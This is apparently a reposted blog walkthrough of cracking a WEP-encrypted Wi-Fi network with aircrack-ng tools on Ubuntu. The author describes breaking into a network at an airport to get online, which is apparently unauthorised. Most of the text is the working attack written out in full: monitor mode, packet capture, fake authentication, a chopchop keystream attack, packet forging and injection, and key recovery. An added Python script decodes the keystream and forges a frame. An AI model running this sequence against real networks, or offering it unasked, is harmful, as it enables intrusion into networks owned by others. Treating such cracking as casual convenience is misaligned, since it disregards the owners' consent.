Wireless cracking using Ubuntu
Last Update: 2018-12-06
Source: Internet
Author: User
A few days ago I went to the airport to pick up my girlfriend. I had been sitting there for two hours and wanted to get online with my laptop, but found that basically every network was encrypted and none was usable. There was no other way, so I just cracked one; the whole process took 20 minutes.
My environment is Ubuntu 9.04 on an IBM X200 laptop whose wireless card is an Intel(R) WiFi Link 5100 AGN. This is very convenient to do under Linux. The whole wireless cracking process is described below.
Put the wireless card into monitor mode
fukai@fukai-laptop:~$ sudo airmon-ng start wlan0

Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
3316    NetworkManager
3335    wpa_supplicant
3340    avahi-daemon
3341    avahi-daemon

Interface       Chipset         Driver
mon0            Unknown         iwlagn - [phy0]
                                (monitor mode enabled on mon0)
Start the packet capture (do not close this terminal)
fukai@fukai-laptop:~$ sudo airodump-ng -w chop.cap --ivs --channel 11 mon0

 CH 11 ][ BAT: 1 hour 13 mins ][ Elapsed: 19 mins ][

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:02:2D:B4:31:01  -55   0       10        0    0   1  11   OPN              C
 00:02:2D:B4:5D:8D  -51 100    10723      199    0  11  11   OPN              C
 00:02:2D:B4:30:F6  -72  96    10393      206    0  11  11   OPN              C
 00:0F:B5:79:DD:DD  -76  93     8306    24444    0  11  54.  WEP         OPN  u
 00:02:2D:B4:30:F2  -82   2     1463       46    0   6  11   OPN              C
 00:02:2D:B4:5D:78  -74   0        5        0    0   1  11   OPN              C
 00:02:2D:B4:31:5A  -76   0        6        0    0   1  11   OPN              C
 00:0D:97:04:90:49  -76   0        0        1    0   1  54.  WPA2 CCMP   PSK  s
 00:02:2D:B4:5D:64  -80   0        8        0    0   1  11   OPN              C

 BSSID              STATION            PWR   Rate  Lost  Packets  Probes

 00:0F:B5:79:DD:DD  00:21:5D:90:E9:0A    0   1- 0     0   129203
 00:02:2D:B4:30:F2  00:16:EA:E1:57:44  -87   2- 1     0       22
 (not associated)   00:1C:B3:1C:BA:D0  -72   0- 1     0       17
^C
Fake authentication attack (my X60 used to crash at this step)
fukai@fukai-laptop:~$ sudo aireplay-ng -1 0 -a 00:0F:B5:79:DD:DD -h 00:21:5D:90:E9:0A mon0
Note: -h is the MAC address of your own wireless card; -a is the BSSID of the wireless AP to be cracked.
21:59:31  Waiting for beacon frame (BSSID: 00:0F:B5:79:DD:DD) on channel 11
21:59:31  Sending Authentication Request (Open System) [ACK]
21:59:31  Authentication successful
21:59:31  Sending Association Request [ACK]
21:59:31  Association successful (AID: 1)
Chopchop attack
fukai@fukai-laptop:~$ sudo aireplay-ng -4 -b 00:0F:B5:79:DD:DD -h 00:21:5D:90:E9:0A mon0
22:00:05  Waiting for beacon frame (BSSID: 00:0F:B5:79:DD:DD) on channel 11
Read 2507 packets...

        Size: 86, FromDS: 1, ToDS: 0 (WEP)

             BSSID  =  00:0F:B5:79:DD:DD
         Dest. MAC  =  FF:FF:FF:FF:FF:FF
        Source MAC  =  00:0F:B5:79:DD:DD

        0x0000:  0842 0000 ffff ffff ffff 000f b579 0498
        0x0010:  000f b579 0498 005a 6772 0400 6e0c 067f
        0x0020:  7cf4 e8fe ff12 31f1 261c 03f3 5e50 e4ab
        0x0030:  3a1f 1b56 fca2 14f0 6f62 7d0b c94e 9d83
        0x0040:  fca4 5e17 703f f414 828d bd8c 8d21 a2bc
        0x0050:  8767 f385 61cc

Use this packet ? y

Saving chosen packet in replay_src-0413-220115.cap
Offset 85 (0% done)  | XOR = F9 | Pt = 35 |   92 frames written in  1569 ms
Offset 84 (1% done)  | XOR = 82 | Pt = E3 |   33 frames written in   561 ms
Offset 83 (3% done)  | XOR = 63 | Pt = E6 |  141 frames written in  2404 ms
Offset 82 (5% done)  | XOR = 77 | Pt = 84 |  198 frames written in  3373 ms
Offset 81 (7% done)  | XOR = 67 | Pt = 00 |   69 frames written in  1166 ms
Offset 80 (9% done)  | XOR = 87 | Pt = 00 |    3 frames written in    50 ms
Offset 79 (11% done) | XOR = BC | Pt = 00 |  461 frames written in  7840 ms
Offset 78 (13% done) | XOR = A2 | Pt = 00 |  452 frames written in  7665 ms
Offset 77 (15% done) | XOR = 21 | Pt = 00 |  156 frames written in  2660 ms
Offset 76 (17% done) | XOR = 8D | Pt = 00 |  256 frames written in  4360 ms
Offset 75 (19% done) | XOR = 8C | Pt = 00 |   31 frames written in   519 ms
Offset 74 (21% done) | XOR = BD | Pt = 00 |   12 frames written in   211 ms
Offset 73 (23% done) | XOR = 8D | Pt = 00 |  681 frames written in 11572 ms
Offset 72 (25% done) | XOR = 82 | Pt = 00 |  231 frames written in  3936 ms
Offset 71 (26% done) | XOR = 14 | Pt = 00 |  126 frames written in  2148 ms
Offset 70 (28% done) | XOR = F4 | Pt = 00 |  359 frames written in  6085 ms
Offset 69 (30% done) | XOR = 3F | Pt = 00 |  143 frames written in  2443 ms
Offset 68 (32% done) | XOR = 70 | Pt = 00 |  253 frames written in  4307 ms
Offset 67 (34% done) | XOR = 17 | Pt = 00 |   70 frames written in  1182 ms
Offset 66 (36% done) | XOR = 5E | Pt = 00 |  100 frames written in  1691 ms
Offset 65 (38% done) | XOR = A4 | Pt = 00 |  164 frames written in  2779 ms
Offset 64 (40% done) | XOR = FC | Pt = 00 | 1101 frames written in 18689 ms
Offset 63 (42% done) | XOR = E6 | Pt = 65 | 1054 frames written in 17906 ms
Offset 62 (44% done) | XOR = 9D | Pt = 00 |  226 frames written in  3819 ms
Offset 61 (46% done) | XOR = E6 | Pt = A8 |  181 frames written in  3076 ms
Offset 60 (48% done) | XOR = 09 | Pt = C0 |   16 frames written in   271 ms
Offset 59 (50% done) | XOR = 0B | Pt = 00 |   55 frames written in   939 ms
Offset 58 (51% done) | XOR = 7D | Pt = 00 |   71 frames written in  1197 ms
Offset 57 (53% done) | XOR = 62 | Pt = 00 |  228 frames written in  3860 ms
Offset 56 (55% done) | XOR = 6F | Pt = 00 |  331 frames written in  5626 ms
Offset 55 (57% done) | XOR = F0 | Pt = 00 |  198 frames written in  3354 ms
Offset 54 (59% done) | XOR = 14 | Pt = 00 |   64 frames written in  1089 ms
Offset 53 (61% done) | XOR = A3 | Pt = 01 |  246 frames written in  4174 ms
Offset 52 (63% done) | XOR = FC | Pt = 00 |  754 frames written in 12819 ms
Offset 51 (65% done) | XOR = FE | Pt = A8 |  102 frames written in  1721 ms
Offset 50 (67% done) | XOR = DB | Pt = C0 |   42 frames written in   721 ms
Offset 49 (69% done) | XOR = 87 | Pt = 98 |   97 frames written in  1645 ms
Offset 48 (71% done) | XOR = 3E | Pt = 04 |   47 frames written in   797 ms
Offset 47 (73% done) | XOR = D2 | Pt = 79 |   63 frames written in  1064 ms
Offset 46 (75% done) | XOR = 51 | Pt = B5 |  252 frames written in  4252 ms
Offset 45 (76% done) | XOR = 5F | Pt = 0F |  108 frames written in  1828 ms
Offset 44 (78% done) | XOR = 5E | Pt = 00 |  241 frames written in  4074 ms
Offset 43 (80% done) | XOR = F2 | Pt = 01 |  193 frames written in  3257 ms
Offset 42 (82% done) | XOR = 03 | Pt = 00 | 1126 frames written in 19048 ms
Offset 41 (84% done) | XOR = 18 | Pt = 04 |  420 frames written in  7191 ms
Offset 40 (86% done) | XOR = 20 | Pt = 06 |  586 frames written in  9941 ms
Offset 39 (88% done) | XOR = F1 | Pt = 00 |  394 frames written in  6683 ms
Offset 38 (90% done) | XOR = 39 | Pt = 08 |  228 frames written in  3868 ms
Offset 37 (92% done) | XOR = 13 | Pt = 01 | 1015 frames written in 17194 ms
Offset 36 (94% done) | XOR = FF | Pt = 00 |  282 frames written in  4801 ms
Offset 35 (96% done) | XOR = F8 | Pt = 06 | 1830 frames written in 31105 ms
Sent 2386 packets, current guess: 48...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0413-220624.cap
Saving keystream in replay_dec-0413-220624.xor

Completed in 303 s (0.16 bytes/s)
View the contents of the generated cap file with tcpdump
fukai@fukai-laptop:~$ sudo tcpdump -s 0 -n -e -r replay_dec-0413-220624.cap
reading from file replay_dec-0413-220624.cap, link-type IEEE802_11 (802.11)
22:06:24.530668 DA:ff:ff:ff:ff:ff BSSID:00:0f:b5:79:dd:dd SA:00:0f:b5:79:dd:dd LLC, dsap SNAP (0xaa) Individual, ssap SNAP (0xaa) Command, ctrl 0x03: oui Ethernet (0x000000), ethertype ARP (0x0806): arp who-has 192.168.0.101 tell 192.168.0.1
Build the injection packet
Syntax example (taken from a different machine, hence the different addresses); the actual command for this capture follows in the next section.
root@mickey:/home/mickey# packetforge-ng -0 -a 00:1D:0F:72:A0:3C -h 00:1C:BF:6A:E1:E9 -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0204-000647.xor -w fvck.cap
Wrote packet to: fvck.cap
Interactive packet replay
fukai@fukai-laptop:~$ sudo packetforge-ng -0 -a 00:0F:B5:79:DD:DD -h 00:21:5D:90:E9:0A -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-0413-220624.xor -w fvck.cap
Wrote packet to: fvck.cap
fukai@fukai-laptop:~$ sudo aireplay-ng -2 -r fvck.cap mon0
No source MAC (-h) specified. Using the device MAC (00:21:5D:90:E9:0A)

        Size: 68, FromDS: 0, ToDS: 1 (WEP)

             BSSID  =  00:0F:B5:79:DD:DD
         Dest. MAC  =  FF:FF:FF:FF:FF:FF
        Source MAC  =  00:21:5D:90:E9:0A

        0x0000:  0841 0201 000f b579 0498 0021 5d90 e90a
        0x0010:  ffff ffff ffff 8001 6772 0400 6e0c 067f
        0x0020:  7cf4 e8fe ff12 31f1 261c 03f3 5e7e 0c42
        0x0030:  d78d 2401 035c 14f0 6f62 7d0b f619 6219
        0x0040:  e060 df45

Use this packet ? y

Saving chosen packet in replay_src-0413-220845.cap
You should also start airodump-ng to capture replies.

End of file.
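Added illustration, not part of the original post: the Python below decodes the chopchop log and the two packet dumps above. It rebuilds the RC4 keystream for IV 67:72:04 from the XOR column (offsets 35 to 85) plus the re-created LLC/SNAP ARP header for offsets 28 to 34 (assumed to be the fixed prefix aa aa 03 00 00 00 08), decrypts both the captured frame and the packetforge-ng frame with that one keystream, and recomputes the ICV, which is an unkeyed CRC-32 that anyone holding the keystream can produce. Hex values are transcribed from this page (the collapsed broadcast address restored to ff:ff:ff:ff:ff:ff); note the dumps carry the AP's real last two address bytes 04:98 where the prose writes dd:dd.

```python
import zlib

# Constructed from this page's output: the two "Use this packet?" hex dumps
# (collapsed ff:ff:ff:ff:ff:ff broadcast address restored) and the XOR column
# of the chopchop log, offsets 85 down to 35 in the order it was printed.
CAPTURED = bytes.fromhex(
    "0842 0000 ffff ffff ffff 000f b579 0498 000f b579 0498 005a 6772 0400"
    "6e0c 067f 7cf4 e8fe ff12 31f1 261c 03f3 5e50 e4ab 3a1f 1b56 fca2 14f0"
    "6f62 7d0b c94e 9d83 fca4 5e17 703f f414 828d bd8c 8d21 a2bc 8767 f385 61cc")
FORGED = bytes.fromhex(
    "0841 0201 000f b579 0498 0021 5d90 e90a ffff ffff ffff 8001 6772 0400"
    "6e0c 067f 7cf4 e8fe ff12 31f1 261c 03f3 5e7e 0c42 d78d 2401 035c 14f0"
    "6f62 7d0b f619 6219 e060 df45")
CHOPCHOP_XOR = bytes.fromhex(
    "f9 82 63 77 67 87 bc a2 21 8d 8c bd 8d 82 14 f4 3f 70 17 5e a4 fc e6 9d e6 09"
    "0b 7d 62 6f f0 14 a3 fc fe db 87 3e d2 51 5f 5e f2 03 18 20 f1 39 13 ff f8")

HDR = 28  # 24-byte 802.11 header + 3-byte IV + key-id byte; RC4 data starts here
# chopchop stopped at offset 35 and "re-created" the ARP header: assumption that
# bytes 28..34 are the fixed LLC/SNAP prefix every ARP-over-802.11 frame carries.
LLC_SNAP_ARP = bytes.fromhex("aaaa 0300 0000 0806")

def keystream():
    """RC4 keystream for IV 67:72:04, offsets 28..85: ciphertext XOR plaintext."""
    head = bytes(c ^ p for c, p in zip(CAPTURED[HDR:35], LLC_SNAP_ARP[:7]))
    return head + bytes(reversed(CHOPCHOP_XOR))  # the log runs 85 -> 35

def decrypt(frame, ks):
    """XOR the encrypted body with the keystream; returns (plaintext, icv)."""
    body = bytes(c ^ k for c, k in zip(frame[HDR:], ks))
    return body[:-4], body[-4:]

def icv_ok(plain, icv):
    """WEP's ICV is an unkeyed little-endian CRC-32, so it can be recomputed."""
    return zlib.crc32(plain) == int.from_bytes(icv, "little")

def parse_arp(plain):
    """Decode LLC/SNAP + ARP the way tcpdump did for replay_dec-*.cap above."""
    if plain[:8] != LLC_SNAP_ARP:
        raise ValueError("not an ARP frame")
    a = plain[8:36]
    mac = lambda b: ":".join(f"{x:02x}" for x in b)
    ip = lambda b: ".".join(str(x) for x in b)
    return {"op": int.from_bytes(a[6:8], "big"), "sender_mac": mac(a[8:14]),
            "sender_ip": ip(a[14:18]), "target_mac": mac(a[18:24]),
            "target_ip": ip(a[24:28])}

if __name__ == "__main__":
    ks = keystream()
    for name, frame in (("captured", CAPTURED), ("forged", FORGED)):
        plain, icv = decrypt(frame, ks)
        print(name, parse_arp(plain), "ICV valid:", icv_ok(plain, icv))
```

The captured frame decodes to the same "who-has 192.168.0.101 tell 192.168.0.1" tcpdump printed, and the forged frame to the 255.255.255.255 request packetforge-ng was told to build, under the very same IV and keystream.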
Cracking the key
fukai@fukai-laptop:~$ sudo aircrack-ng *.ivs

                                 Aircrack-ng 1.0 rc3

                 [00:00:02] Tested 296 keys (got 15985 IVs)

   KB    depth   byte(vote)
    0    5/  6   01(20224) 00(19968) 61(19968) 06(19712) 7B(19712)
    1    3/  5   0F(20736) 24(20480) 99(20480) CD(20480) 0D(20224)
    2    0/  2   45(23040) 17(22272) 41(20992) B2(20992) 52(20736)
    3    0/  1   67(25600) 3E(20992) B3(20992) 57(20224) 76(20224)
    4    4/  5   89(20480) 82(20224) 4B(19968) 81(19968) E6(19712)

             KEY FOUND! [ 01:23:45:67:89 ]
        Decrypted correctly: 100%